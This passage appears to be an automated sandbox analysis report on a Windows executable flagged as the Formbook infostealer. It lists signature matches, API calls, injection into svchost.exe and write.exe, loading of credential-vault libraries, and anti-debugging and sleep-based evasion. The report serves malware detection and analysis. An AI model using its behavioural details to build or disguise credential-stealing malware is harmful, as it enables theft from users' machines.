            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | File created: C:\Users\user\AppData\Local\Temp\uppishly
            Source: r6lOHDg9N9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: write.exe, 00000006.00000003.2272892467.00000000028C2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2273032680.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.00000000028E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r6lOHDg9N9.exe | ReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | File read: C:\Users\user\Desktop\r6lOHDg9N9.exe
            Source: unknown | Process created: C:\Users\user\Desktop\r6lOHDg9N9.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: r6lOHDg9N9.exe | Static file information: File size 1339905 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fZXsbVktlmkz.exe, 00000005.00000002.3551483374.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163431808.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: r6lOHDg9N9.exe | Static PE information: real checksum: 0xa2135 should be: 0x149afe
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041897C push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004141CC push eax; ret 1_2_004141D5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418983 push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403240 push eax; ret 1_2_00403242
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418A03 push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417E03 push edx; retf 1_2_00417E06
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413F3D push ecx; iretd 1_2_00413F42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx 1_2_032309B6
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0284B81D push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0284B79D push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0284B79A push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0284AC1D push edx; retf 5_2_0284AC20
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044527FA pushad ; ret 6_2_044527F9
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0445225F pushad ; ret 6_2_044527F9
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0445283D push eax; iretd 6_2_04452858
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044809AD push ecx; mov dword ptr [esp], ecx 6_2_044809B6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001DE07C pushfd ; retf 6_2_001DE07D
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001E4BC0 push edx; retf 6_2_001E4BC3
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001EEE50 push ebx; iretd 6_2_001EEEA8
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001E76E0 push edx; ret 6_2_001E7720
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001E5739 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001E5740 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001E57C0 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_041F5532 push ds; ret 6_2_041F5534
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_041FE7AC push esi; iretd 6_2_041FE7AE
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_041FB0AA push ds; retf 6_2_041FB0B7
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_041F281F pusha ; iretd 6_2_041F2826
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004440780_2_00444078
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeAPI/Special instruction interceptor: Address: 3ECCE6C
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9769
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeAPI coverage: 3.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep count: 203 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep time: -406000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep count: 9769 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep time: -19538000s >= -30000s
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe TID: 6500Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe TID: 6500Thread sleep time: -34500s >= -30000s
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001EC450 FindFirstFileW,FindNextFileW,FindClose,6_2_001EC450
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3551111899.0000000000520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
            Source: firefox.exe, 00000008.00000002.2384386809.000001862960C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004175D3 LdrLoadDll,1_2_004175D3
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
